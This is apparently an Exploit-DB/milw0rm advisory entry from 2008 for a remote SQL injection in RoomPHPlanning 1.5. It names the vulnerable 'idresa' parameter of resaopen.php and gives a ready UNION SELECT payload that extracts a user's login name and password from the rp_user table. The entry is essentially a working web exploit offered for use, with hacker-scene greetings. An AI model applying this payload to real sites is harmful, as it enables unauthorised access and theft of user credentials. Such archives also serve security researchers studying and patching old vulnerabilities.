RoomPHPlanning 1.5 - 'idresa' SQL Injection

EDB-ID:

5670


Author:

His0k4

Type:

webapps


Platform:

PHP

Date:

2008-05-24


###########################################
{+} RoomPHPlanning v1.5 remote SQL injection exploit
{+} Script download :http://www.beaussier.com/roomphplanning/telecharge.php
{+} Founded by : His0k4 [ ALGERIAN HaCkEr ]
{+} Greetz : All friends & muslims HaCkeRs...
###########################################
{+} Exploit :
    http://localhost/[script_path]/resaopen.php?idresa={SQL}
{+} Example :
    http://localhost/[script_path]/resaopen.php?idresa=-1 UNION SELECT 1,2,3,4,5,6,concat(LoginUs,0x3a,PwdUs),8,9 FROM rp_user where IdUs=1--
############################################

# milw0rm.com [2008-05-24]